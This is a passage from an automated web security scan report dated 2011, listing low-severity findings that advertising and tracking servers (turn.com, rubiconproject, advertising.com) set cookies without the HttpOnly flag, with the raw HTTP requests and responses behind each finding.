rpx=5671%3D11993%2C298%2C3%2C%2C%264212%3D11993%2C682%2C3%2C%2C%265421%3D11993%2C682%2C3%2C%2C%264940%3D12109%2C14%2C2%2C%2C%264894%3D12124%2C0%2C2%2C%2C%267259%3D12124%2C145%2C2%2C%2C%265852%3D12124%2C0%2C1%2C%2C%264210%3D12124%2C0%2C1%2C%2C%264214%3D12267%2C471%2C2%2C%2C%264338%3D12401%2C0%2C3%2C%2C%26733%3D12401%2C0%2C1%2C%2C%267100%3D12419%2C0%2C1%2C%2C%266198%3D12424%2C82%2C2%2C%2C%266560%3D12435%2C57%2C2%2C%2C%266643%3D12441%2C56%2C2%2C%2C%266432%3D12470%2C0%2C1%2C%2C%265576%3D12675%2C0%2C1%2C%2C%262827%3D12675%2C0%2C1%2C%2C%265573%3D12675%2C0%2C1%2C%2C%265720%3D12675%2C0%2C1%2C%2C%262372%3D12738%2C0%2C1%2C%2C%265326%3D12747%2C0%2C1%2C14%2C%265364%3D12747%2C0%2C1%2C%2C; expires=Sat, 16-Jul-2011 11:29:51 GMT; path=/; domain=.pixel.rubiconproject.com
put_2046=WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP; expires=Sat, 16-Jul-2011 11:29:51 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.258. http://r.turn.com/r/beacon previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/beacon

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

uid=4325897289836481830; Domain=.turn.com; Expires=Tue, 13-Dec-2011 11:28:42 GMT; Path=/
pf=fhA4EA1v0vr5FnVTvwlQD8K_9kSi34Fh5czW3ZLFH71rcFW6poMFjuQuzMPstcOZ2GHZm3PL_0ZJzm4ZFVSYE8Duq7j3mYBLrRaQl7cOSC3bbe6c-Httg-DijmMpowplq-dHAl-abYU1X5bYp5n9Cdcc1kdI2OrvyH13NxBc5ZZblSYEdunA88QWsswFnK34IIbRFAp6kq4cSFltcxEru3wiHybxFoqFMdQqHxwvVjx7zBU2vT3hB9b5_A14u9LALQcduwwYmRsag5v8ztN6UjLmZCeHJ6h93qhIv-rUsPdbHJlod6TESSrv6Thxy6WamFlDf1zNmpUN4p-XWvhOtwyxeWnRI3qk58dH_r-y85DlfxWknFJRlb9hzn2M2frNMEh1GRb-PuEMe2Z7syUFVcpaPHcpz9cpkPkyFl8KnA3kFjox_1jCVFJu9ob0C05NyZFnUVV8zZwxZ0Jqede_6SEBTTPtCItPvtKKOGZm7eRvub6YMtD_axmOFpwTegZ0Ik_TZHzQHPkidsWQCuARecCEpqUhieOSE4eC6JSVC4Kb2gj1O0-Z-93OhvmeJIXktssbq-UJ0gwP_tjxgElGHyc6m9bbAQkPtkmDiMOswjx_rgnZHXFHutbbxwpp0mzc0f3MrVLB8Sbr0OplZ0YmpQ6pPLr5WGwJSCaSLyPeD8tW8QIeq5GdjjA2VLfSe86B_U2uPTCuMGNYOoaYgaTljvNEkx61aa1aewp4qtmGVPek9QMkyjNbxjUHQBR4E4B3AGUJgKTp8qs6Sh239g-tJFoqZVBpLhgL2E7flNbkDPo6oQ9T128OqIjRPGIgGqJ0U92zB6HrH6sGkt833E2I0kS2ttJsutMRJGOYaR-soWsrqivW0mVJFXQS3dhrTE8SaKKXBxFLQC_mPwxjkeL_DORS4P3pxhLoRgihOxnoSsDlCw2HnM4YLv0kpO_GVKupX5sc0C6btaAdqNlMlZs4oTCY_AT5rVNqw6Tz15xoxFpBYNWUpIQcuBazjzssqEIPZ5bfZwZFU6nN1pDVXOYaJ8DdOZYF55d1PpfBxPHyuH2RHojg75w7am5jitqGicFdlnCbKQptaZxbGUz6SlTnZDsK2rDt0bHrM544CpImVmkSAL_bstOXxNREWWjoLotWNuGCSfD1VO5qVu-qWBAgSu17OBqpU4PgvZpleNg0TWB0RMQGeS7_O3x1RSd2BwdXFbTy3K7n-2J0MAMXWCl91Alk4rQOdMMecrpXJTexKmmidw53l0QWbnqGQiRb9ZAs_QgD2QiSjBcYABPrjR7j2Lk3dbwCXD_XY4Mg3uZtdk-w7CLx2fkIxdgjO29elycICbV2IcqKk7eSEhOsR2I7EGmUrCtsiY1t4sA6JphOvlAw2WskIYUfYQOHF0V7XP3BnwAAohd7yjHvV65-NFPJ6k-u-He4VyfKWMt3v_OVQR5WJnhMTPJdNSN4V9p_6WYg3opYqtkQWt6725kkv7T1ST5UzgcmolTZJyYmPqM8Zx5g7UbhYw2jQWp91FsB5bAn8V7foSNbpzcCtEZ09ICcgOStrfC9SER61onVprd_onMryjVa6LMEO3kCLjO0IvNryW-5O2fQU_LHsnkesyo4l_i11ujvhhLGZ0k6S7VChstVJ88iyvvPxUtm5pXVUyRredJBloe4tetp7m__kLcfbP_Eqw2fpNrGQbnw-cmbaxS3fhnjhdAkaWgX2Wn9EHpE9nRxmNOfa7N8eKNOKfhfV_78LZJ3SfN4upb6BnAigOn-d0svVlW7kDvxwmUOO6di4L3hItnppqGTp1J33WvO-vJNJIZsJvokUWIw2BigWHhckIDi1Fkwg7XRH_BYZrAe39meCnmP7nr3-LKEGgJRL73oAwAGqSF7i_Nh_lHANdO2N4y0oQd9WbNchd4KJ0GSKpCvg4R8pLEeo1jSuGz7oMRCuDH5HeVZE_VQRFdHjYukJVRG_nBNs8V1gYCYsm415gn0H91lt8VKKWdXKqCTDOHhKd5JX6_fglnf3B3DmgLLJzD9On5Z3FQzHr3F5l8MAWEAnGYSU3-NOxK7uJcD_RRN6ky6CN1PuWwiDRMNWXU5_w-MjKW_GcbVrZmBGA1Mut6aa3Kh20avKWSvO9zAk-RcrayBwLlfQ6HJrTI2xWc5r5ahhRJbOL_KFk5m6LShjvKyOkYlhN9vFIet_K_9AtqbHgySr2KqGN9-ddSeXZA12yR4NFKSQVYrwFZeGZXu_hX3sKoCSIV4DWAcntMWndiH-vYNrPSKHelCwJAEbBWk-i6uJHnwpuo_ZlHWQ7Uow01sqOwZlLLH_X5cABcyU66VZIb4K9aY6J9YtdmBMo_MbyWI1dW0gjXofsjNDSVdmLkilEs-WrYhDZbcAUC80ovx39ycP1rWckNvY-gaRNscNt9mHktMDgPCf0UpOcSdXY1OdfB0pHhAy-UN7WkybRCuMZ-d6VJt7LsD-FnsnfZ8jbE_g98PqM_uWZz3crv1z5M8Pih0AXJSyUJ19uPJlG_3tcOZ-AmYnpm1EC9jEUmxwdT9kcJ4edcTEb0PB7-YTDSCBFoXDPahTXWMSS5FlUmssMmrL-8e41aSohTuap9UjfyHEsmR4UUOeK0HWz0NORe7zSZgfEzvdO7smtDILpMESpu_ZZWNCNkhXtVikoOt8vg9pIynRKrCXnowDQSRXo96RunD8qfbaYv7vzaVyY9QuY541PZO6Ny5vnKLIxfYwIsEt0kokdZeF3EOMiBo3Mk1h9PIxxR65ZOcJUjvfs2TVsX4KQGnKdgRSGoam5QlCCa_OGKS42qBmwv_wvY-RzCoz9_t8alDj5k8zTq0J4PqUJQ0otSVJy2PGeMK-XcarFw0nA3H-YF2Wl5Fn0PEnfhbtUbz9ct1MV79PyeyDZ9DvWp_EdJGyYA5O7dtrDry_s9lkRyz6GlDS8t-Rfdp17-epPba0D46AHy_lzghAFfvmsyLLawNKxCeHxRRevicSSfkeY6SuOCRIr05W-BHUNxq2SQwElM-yQwx2zQEg-z8-t9y-tMNQp-ZYdLjH27LJobmgwjquUBX0fZWtmyuXhGsmOr7JOEwxd8-DByQ2C9Yv7XgNTcfznCXbacaQtf_dWsSUQ8GKNCUK0zaUBXpMoL53_gWUTUNlxoMRwaryBWePdHp2MxlVET9_8XQcM4q6yLp52rmfN4q3l5EKsYbOM4UyWN4YxvN7y_b8zhiDb1QFGUx3T6Icw0cNHVJuxB7zpQOkrNL46G4jxTVXOyK2iEcB5PBiiMFehpPTzXehUikIWBvjjSGaDoOwEZA0LEeWwvlbOo8Dfurrf5fw5Oi; Domain=.turn.com; Expires=Tue, 13-Dec-2011 11:28:42 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/beacon?b2=uAuceuD961GAkMIYzv5AQziOQ-eCNWHV6KkD_P0UpEIHL-lTlput787BXKmhwi2DTI-ZOLCjHLM7w-8RpLcB7A&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=3076801;type=homed040;cat=homed063;u1=outdoors%3Eoutdoor%20power%20equipment%3Ewalk%20behind%20mowers;ord=9370099140796.81?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=4325897289836481830; adImpCount=QM70Whve3yMvxkhKlZSDFc8jBjr9GZaXPVHd3KPTbrVh-L3XcPmT4hHXOQgApIlYYCcoFPzHtthoKoScENuCacAfwlpOGZwMiTYKzkLyV6yLZO8TKZa-nLTQQ4a65pbCg5Ip47iYWcr2TLdwTDr0L4oBBpiyP3J8NU50OkfeFof5nfT0WqmMXNTAO47jNWqP9DMJbnJ4jgxRBVKYcWOOoBo1vu2lsqV8DN9Vps5BPlmPLL60Ne9Ei9t17XStRc4rGERgBg46FC_PZzOaKvw_-cZloB2cEevUSjzsvfqJ8qZhgZ9g0kmeR-0KBwkm_b3-nHDVWO4oEVu9LZTNJAoERvvIJejvF6b257maU3ML6OZFn0pS1M8s2KPrvUfPPF0_ewHYGlNdqDaG9FYWPprE_WjI_lsRoaOz7-O-vgmKJiTz-KIh4eZr0ecbMlDpVZu91zdW0hE-4eLwR7bomsP7JSdqWSoz4sC-t192PZJ_v5Q-P1VlQMzPKKE64Al6GE9_qQBVWHaPX-roIWbRumWL1-XpDwD22ZRNSBnUmAd0wjxC8t8bNFJSd1YiPEk8t_65cnD2Yeg02hxYDcV4Js2beeQ5R5-3xXfzzH2krAPRf428tdb3ea_CHM6GXs7htoYXSpzxUEP4Lawlcjwmuu0sgABXItk3mefJp5QRHv4O0nQLT7vqCmjKMUnpRJ6SJsSELsnefots81rrNB8RkZzwt9xgKqCmjZaalMlFzn1gedMiR83opqf2DdmsWkwVThPxhyYcbbPOXHwjOkupykmG8XHU2Z_bwsvqeY5PpknKks9Ka5pRG06H0tQ1iybpB3pDqsDA387b4GyTrdtR0OxRq1W2-clEv_ue7qpjwh19AlSzwxLx1pBhUX4CYwoSQucKtJqb949HbLP0at-l-Te-c7NLS367-cid5bH8-bJWmY8nC9B9w1ij88w7eqsM7UhZeuq4rrlofmxpvpW8sH43ef-7J7zFZpaqjQcGC_vq5exjB6sqt4Mo-GvkAj2qErRL9pWBI8bQOJli1okJuMhLcQljneDOkY9olIfd-ve5Qn4-P1VlQMzPKKE64Al6GE9_6W9aRH84b2cB20BvmgB1t-XpDwD22ZRNSBnUmAd0wjyOWY3k4-itBWJe_k62xWOCrFV4LhRdbHCAEu2Xc3dVj-Q5R5-3xXfzzH2krAPRf418WpxTiSnvzOJ-ZkQfvNQASpzxUEP4Lawlcjwmuu0sgAGs1MSewshLM0Q6GhK5Ns8fU1J7JmYpzzzNP9hB_wUy05oRsNhTbhcD1_xCDQojfMSuZLsISBijKSjMDSgLlyDjsNAVa5Ct7DxoA1avkLsQ815KVjL9JqXyOpgagVKRMbntt6vzlmgFJ9k1Zzq45WeFCQUiSJFaYOp4MQlbe-RFUEK9KsJrC9CLkGJUacP7jEa1wTMgEYoXiZA8_W3FI42qThwrh-6wCu7vlgqZNOXixmWgHZwR69RKPOy9-onypkTIcQzOQc65c9KVO3IQPv8Yd11jfaAGeomVXk2jyqz756mNhe7mBUb-nxi7SHg4OCY4fQNDPmLA1QCvKDvVxcR7AdgaU12oNob0VhY-msT9lb_ydeK6sfV-VwC1t6PXZrSU8zXCbuEO-Hn-xUU7T4MdZMXr1rBrtZHchRIeH_p0MQswiaZbyLrfvl0j4wXxTj4_VWVAzM8ooTrgCXoYT3_ukoy-I69c7SrUTlHbB6rZ5ekPAPbZlE1IGdSYB3TCPPtQxe5L3Tuc-yk0WOEmJZ9iOsnV5UjcUOjnXUSJzJan5DlHn7fFd_PMfaSsA9F_jfnYBNZ11ca-Wgmkknbh9eNKnPFQQ_gtrCVyPCa67SyA_xeh6xaAKc9mefeGrL2bordkSY3wrTx66nlJUXJL2YzTmhGw2FNuFwPX_EINCiN8l08PBB5hX0JN8MvjDOsPSeOw0BVrkK3sPGgDVq-QuxAsFTUl8EdeBakl_JEHsyGF2Jfo-RxTjyjBkOV794zNZ0kTA-aymPAds4qYFrApgUvcPT0oUz-YZYVaDcHqgl-9xmWgHZwR69RKPOy9-onypimfvYrBKXvtznWuT43S50y-3u16r0dKm_zz3ndHe3WlG-QgtH60dqlqdrI16uF-EVNzoshUKoWhiHnNcI8oP4V7AdgaU12oNob0VhY-msT9kNb2AdwFV5i2vxwzlIKJ3BfY904hG-_CHlEd9j-vzfzk5Jifrc9V1OOzEX32QifKI3TThUmivC2QQLLhMmAROj4_VWVAzM8ooTrgCXoYT3-ZdIfAS6iVxgYyOedo9Ki95ekPAPbZlE1IGdSYB3TCPEX3xTtUTn7ghX1OdIngM2q-RWnunI4BlM040X2RcB965DlHn7fFd_PMfaSsA9F_jUBCGuQvL_fhodmVMnOIMvBKnPFQQ_gtrCVyPCa67SyAw4hmx2eXEqzbsKwy_MNlFfUa0Y_5ftklciMdgbQhb_wbdYORBXyNJvBU7ewnBysYP_zg1-oPoaJCGGP6Vt55Gz_84NfqD6GiQhhj-lbeeRs__ODX6g-hokIYY_pW3nkbP_zg1-oPoaJCGGP6Vt55G1OKf083dm4Ocqz5E2RJpVu9TfQkOcNz7DOIIZP_23WvvU30JDnDc-wziCGT_9t1r71N9CQ5w3PsM4ghk__bda_nUnHYqNkC6RPs4-2B8pJoMqCuwkKr26TEWeaS686ExCPxJGFKBs6DSrH4oyWVjhIBdxGEbgsgCDz8r26d8pRZAXcRhG4LIAg8_K9unfKUWejxkXIMl02q9l3ycv51k_QH1ePXpCkOqUdD3FJ26E0LEgnOhSnZw4WOirtIvKWwJRIJzoUp2cOFjoq7SLylsCUSCc6FKdnDhY6Ku0i8pbAlEgnOhSnZw4WOirtIvKWwJTJGg5u5RuPReUxP5byb5LGsjsJdNDz0zBLNR8ReLDcirI7CXTQ89MwSzUfEXiw3Iv5E8JDY11x5xog0GskBswr-RPCQ2NdcecaINBrJAbMK_kTwkNjXXHnGiDQayQGzCjVgVkoy7DysIPcuC3AUG0sb1BDdWaxOURi_bqX1S5T5G9QQ3VmsTlEYv26l9UuU-W___E3ohWz6drp_rI2j18pjDJAj7Gbh3rF9uN2-5_zdRHqYmtLfdK6unD4Xv15XLH0evbFMdkuI2WqEUI01UYXDJU38vLMvNPfD69rioBNl6-78JM-YwVK9vMhQzP5aE-vu_CTPmMFSvbzIUMz-WhPr7vwkz5jBUr28yFDM_loT6-78JM-YwVK9vMhQzP5aE-UaEwuQGXrKf1B0pg93pQC8wfsfoRTDgpAqCg9KVA9UvMH7H6EUw4KQKgoPSlQPVLzB-x-hFMOCkCoKD0pUD1S8wfsfoRTDgpAqCg9KVA9U-Nxmcu6N80G4H7yE1a6GL_jcZnLujfNBuB-8hNWuhi8zo63SsMKXllQ8R3TROrVZwRV4qFgI_yJZybaj30x3rZThUGsgezmPZdo0hiRJAEU2UlTEERLOiMahUz0Je5vrQpUNsf8ubz28dE3HpFhXM4HLQRF00hhIXSJp9kwMyEKBy0ERdNIYSF0iafZMDMhCgctBEXTSGEhdImn2TAzIQou93XF3r4cgLiZIl0wssIM; fc=c8voyByxtfmxf-PR5HgfpjgORIc3Od-xFb-8M8t9VWkz6wrQqI-cCCIP4q7JSoro0YGlpSJHEwaZrD9xrQykZRLTM2UWqcEggsPn2JlFm6WKJ47y0SjHASrSoX2-_RWGR8GD8YL2uMyYOovbWSVtT_OjMRX_o6D3TvHXeB0H3IoJPxIPX2Q6BIRFliap-hOlRK2X8EADYMp4JB-33zSWnLP_4lD6MCBjT4SRxTIxlhNKLFBAG3Fk9H3_mDAMZFkDVnBVtdUIoJ-JIgllkJFaAJbHZLznezJA10wgg7oc-ufuxx6wPWxSLH-VTpbekwI2; pf=jXzwVIIe0SAeD8gWPKjuE8-ct6tD5BWiUiYpsGFlfMC9NuH-7Dbi6B51EnTYR5-iOgZRRwBy6DZwiqOHT6IElDIDhxlaGx8hHg3wXZvgAhQmka8RIRKSsF1jjtV6gI5bljvN0VRTfDPzhiZhKzxoF_rp1CVxF2mczlcxrXlKeIt_e97B5v4gtIwRb9gWerT6SZNfDixsQmcvwT3cj6qsD1YUGW8kAIFGjnsHsQubrGhyd-a6SoFtlzPI1m7lqOrzKG62Ouoq_MnCBexx-IXs0wqFGi20iMryPzKhFIgD9TRKQvWi-gwfjmLH65nG8uDjmRHSyuQWrv6-0K13whBmqMMkBFHXgTQykKVmMrOXkTImGjDMOFGlcFZLXkL5DfMYlNewCtfBYR9k_ubONlcmrNayLhAfbvMx03_QEb7SwOTka-xiDvXxhOXZWX9LSHUpFSBC8e2rD9y9_y_vSTtwLnFM-trIKubtEmFArILuMGV9B58oEFeGFl-N6VKfU94TyqoDXT1z2-LOJoHJJmbycn2VdyRWMoz0MJ92lenB0Enr8KmRHccEmPJbfWloKMqvymfbnNdr76iq20r7UPWKf1cnuH7JxEukYFMLKmfTWaOhlAa-ABMwNuo7Vw33CB7yjmRrMK_4y831eM_Q9ai6iuVxKUcM2zvz07RwR2gDSZO0zsyFtWnf4bgu8uiMcKoKQubbDh7yy7VKoKm3NHyhBPpDv4R2b-LD02LPrfkDoNG-JVF8wGs9QJzZ7X7pmVv1-5-k8QZXYxxPHYXLZ5ZlZ7srGOrmHUGAGAa34SUV_msfG2VPWzgVAeVXUdcic92NhdIXeTMujO6Xkpxqvk5f7Z_aVKOVMmX7GzMccSixrr2FdtRzxraENBQImNBNPmc-76WiVavVIV7dEbeehfvbaQIeFks7prpU3JmJcp6gIfBHgMBwI4Gac8VWiyN-wrJTS7BG-ZJhaA-X7sZihqOeSt3vgqVyZFwe8tv4n9m4XgJOv117Rph82494QFH9nQMOF51d6EB91l-ccAJiFLF8DLuHEpZWJmKwAkG1noZuRpuds8Kghk77jmwldiTPqW35mHKeC6oTX7ekXkI-eu8dKRbg51Pc0eFE3yxviie2JbpWBf4tKIwkwF5Dm_ctyQmlyESbwyVENVhDk-GGLtG4XypAqI29qmodf8CikjvvqBW_WRb_aKxObPalYTPYr86KIHGoqY_KW-Dhqg1PeSYXuUuEVpM3EUxe8KvI5nEdFFnTVy1R1dEXFxxKtSs8wkDM-YxLbPfNba4kF5lJi_U8vGU0IUuOnRQIvCjdWVa1fEhK_KLr5Y7O86QRtAspzmaq-fVrQlWtpfPPkni3CRWGu0h_MtIqxu4McSiriw3E0ny2QdLUoe_B6wgU9jI28wBseOAtpy2e4Fv71-bKOrhX2Caw2SYtp2QZGcaXxiQod_wFsyaXwL0ukkjQ9Ipn5OBK8Esf3AI1vcHkbm5E8hsGB6_YqHw2pmgY9PCpH88o2V6QgiQM3tzkLdBmsBmrJxgO-qwkMNUHQPAIhFwOSHcQvhDlVNrjRUinuOAaHaBMki4; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C10%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15138%7C15138%7C15138%7C15138%7C15138%7C15138%7C15138%7C15110%7C15138%7C15138%7C15138%7C15138%7C15138%7C15138%7Cundefined%7C15138%7Cundefined%7Cundefined%7C15138%7C15138%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15138; rv=1

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Tue, 13-Dec-2011 11:28:42 GMT; Path=/
Set-Cookie: pf=fhA4EA1v0vr5FnVTvwlQD8K_9kSi34Fh5czW3ZLFH71rcFW6poMFjuQuzMPstcOZ2GHZm3PL_0ZJzm4ZFVSYE8Duq7j3mYBLrRaQl7cOSC3bbe6c-Httg-DijmMpowplq-dHAl-abYU1X5bYp5n9Cdcc1kdI2OrvyH13NxBc5ZZblSYEdunA88QWsswFnK34IIbRFAp6kq4cSFltcxEru3wiHybxFoqFMdQqHxwvVjx7zBU2vT3hB9b5_A14u9LALQcduwwYmRsag5v8ztN6UjLmZCeHJ6h93qhIv-rUsPdbHJlod6TESSrv6Thxy6WamFlDf1zNmpUN4p-XWvhOtwyxeWnRI3qk58dH_r-y85DlfxWknFJRlb9hzn2M2frNMEh1GRb-PuEMe2Z7syUFVcpaPHcpz9cpkPkyFl8KnA3kFjox_1jCVFJu9ob0C05NyZFnUVV8zZwxZ0Jqede_6SEBTTPtCItPvtKKOGZm7eRvub6YMtD_axmOFpwTegZ0Ik_TZHzQHPkidsWQCuARecCEpqUhieOSE4eC6JSVC4Kb2gj1O0-Z-93OhvmeJIXktssbq-UJ0gwP_tjxgElGHyc6m9bbAQkPtkmDiMOswjx_rgnZHXFHutbbxwpp0mzc0f3MrVLB8Sbr0OplZ0YmpQ6pPLr5WGwJSCaSLyPeD8tW8QIeq5GdjjA2VLfSe86B_U2uPTCuMGNYOoaYgaTljvNEkx61aa1aewp4qtmGVPek9QMkyjNbxjUHQBR4E4B3AGUJgKTp8qs6Sh239g-tJFoqZVBpLhgL2E7flNbkDPo6oQ9T128OqIjRPGIgGqJ0U92zB6HrH6sGkt833E2I0kS2ttJsutMRJGOYaR-soWsrqivW0mVJFXQS3dhrTE8SaKKXBxFLQC_mPwxjkeL_DORS4P3pxhLoRgihOxnoSsDlCw2HnM4YLv0kpO_GVKupX5sc0C6btaAdqNlMlZs4oTCY_AT5rVNqw6Tz15xoxFpBYNWUpIQcuBazjzssqEIPZ5bfZwZFU6nN1pDVXOYaJ8DdOZYF55d1PpfBxPHyuH2RHojg75w7am5jitqGicFdlnCbKQptaZxbGUz6SlTnZDsK2rDt0bHrM544CpImVmkSAL_bstOXxNREWWjoLotWNuGCSfD1VO5qVu-qWBAgSu17OBqpU4PgvZpleNg0TWB0RMQGeS7_O3x1RSd2BwdXFbTy3K7n-2J0MAMXWCl91Alk4rQOdMMecrpXJTexKmmidw53l0QWbnqGQiRb9ZAs_QgD2QiSjBcYABPrjR7j2Lk3dbwCXD_XY4Mg3uZtdk-w7CLx2fkIxdgjO29elycICbV2IcqKk7eSEhOsR2I7EGmUrCtsiY1t4sA6JphOvlAw2WskIYUfYQOHF0V7XP3BnwAAohd7yjHvV65-NFPJ6k-u-He4VyfKWMt3v_OVQR5WJnhMTPJdNSN4V9p_6WYg3opYqtkQWt6725kkv7T1ST5UzgcmolTZJyYmPqM8Zx5g7UbhYw2jQWp91FsB5bAn8V7foSNbpzcCtEZ09ICcgOStrfC9SER61onVprd_onMryjVa6LMEO3kCLjO0IvNryW-5O2fQU_LHsnkesyo4l_i11ujvhhLGZ0k6S7VChstVJ88iyvvPxUtm5pXVUyRredJBloe4tetp7m__kLcfbP_Eqw2fpNrGQbnw-cmbaxS3fhnjhdAkaWgX2Wn9EHpE9nRxmNOfa7N8eKNOKfhfV_78LZJ3SfN4upb6BnAigOn-d0svVlW7kDvxwmUOO6di4L3hItnppqGTp1J33WvO-vJNJIZsJvokUWIw2BigWHhckIDi1Fkwg7XRH_BYZrAe39meCnmP7nr3-LKEGgJRL73oAwAGqSF7i_Nh_lHANdO2N4y0oQd9WbNchd4KJ0GSKpCvg4R8pLEeo1jSuGz7oMRCuDH5HeVZE_VQRFdHjYukJVRG_nBNs8V1gYCYsm415gn0H91lt8VKKWdXKqCTDOHhKd5JX6_fglnf3B3DmgLLJzD9On5Z3FQzHr3F5l8MAWEAnGYSU3-NOxK7uJcD_RRN6ky6CN1PuWwiDRMNWXU5_w-MjKW_GcbVrZmBGA1Mut6aa3Kh20avKWSvO9zAk-RcrayBwLlfQ6HJrTI2xWc5r5ahhRJbOL_KFk5m6LShjvKyOkYlhN9vFIet_K_9AtqbHgySr2KqGN9-ddSeXZA12yR4NFKSQVYrwFZeGZXu_hX3sKoCSIV4DWAcntMWndiH-vYNrPSKHelCwJAEbBWk-i6uJHnwpuo_ZlHWQ7Uow01sqOwZlLLH_X5cABcyU66VZIb4K9aY6J9YtdmBMo_MbyWI1dW0gjXofsjNDSVdmLkilEs-WrYhDZbcAUC80ovx39ycP1rWckNvY-gaRNscNt9mHktMDgPCf0UpOcSdXY1OdfB0pHhAy-UN7WkybRCuMZ-d6VJt7LsD-FnsnfZ8jbE_g98PqM_uWZz3crv1z5M8Pih0AXJSyUJ19uPJlG_3tcOZ-AmYnpm1EC9jEUmxwdT9kcJ4edcTEb0PB7-YTDSCBFoXDPahTXWMSS5FlUmssMmrL-8e41aSohTuap9UjfyHEsmR4UUOeK0HWz0NORe7zSZgfEzvdO7smtDILpMESpu_ZZWNCNkhXtVikoOt8vg9pIynRKrCXnowDQSRXo96RunD8qfbaYv7vzaVyY9QuY541PZO6Ny5vnKLIxfYwIsEt0kokdZeF3EOMiBo3Mk1h9PIxxR65ZOcJUjvfs2TVsX4KQGnKdgRSGoam5QlCCa_OGKS42qBmwv_wvY-RzCoz9_t8alDj5k8zTq0J4PqUJQ0otSVJy2PGeMK-XcarFw0nA3H-YF2Wl5Fn0PEnfhbtUbz9ct1MV79PyeyDZ9DvWp_EdJGyYA5O7dtrDry_s9lkRyz6GlDS8t-Rfdp17-epPba0D46AHy_lzghAFfvmsyLLawNKxCeHxRRevicSSfkeY6SuOCRIr05W-BHUNxq2SQwElM-yQwx2zQEg-z8-t9y-tMNQp-ZYdLjH27LJobmgwjquUBX0fZWtmyuXhGsmOr7JOEwxd8-DByQ2C9Yv7XgNTcfznCXbacaQtf_dWsSUQ8GKNCUK0zaUBXpMoL53_gWUTUNlxoMRwaryBWePdHp2MxlVET9_8XQcM4q6yLp52rmfN4q3l5EKsYbOM4UyWN4YxvN7y_b8zhiDb1QFGUx3T6Icw0cNHVJuxB7zpQOkrNL46G4jxTVXOyK2iEcB5PBiiMFehpPTzXehUikIWBvjjSGaDoOwEZA0LEeWwvlbOo8Dfurrf5fw5Oi; Domain=.turn.com; Expires=Tue, 13-Dec-2011 11:28:42 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1210787&t=2
Content-Length: 0
Date: Thu, 16 Jun 2011 11:28:41 GMT

11.259. http://r.turn.com/server/pixel.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/server/pixel.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=7183228360285489408; Domain=.turn.com; Expires=Tue, 13-Dec-2011 12:06:35 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=7183228360285489408; Domain=.turn.com; Expires=Tue, 13-Dec-2011 12:06:35 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 16 Jun 2011 12:06:34 GMT
Content-Length: 342

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
src="http://cdn.turn.com/server/ddc.htm?uid=7183228360285489408&rnd=8627178031942219930&fpid=4&nu=n&t=
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=16893018/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

F1=BA5U63EBAAAABAAAAoBA4BA; domain=advertising.com; expires=Sat, 15-Jun-2013 19:03:44 GMT; path=/
BASE=x7Q9ji23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mZqiQCHOlSr37nk7zuuytsX+/P!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:03:44 GMT; path=/
ROLL=U6APXjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCzv+jvvGKndKOIZB/g+cLdnWpK!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:03:44 GMT; path=/
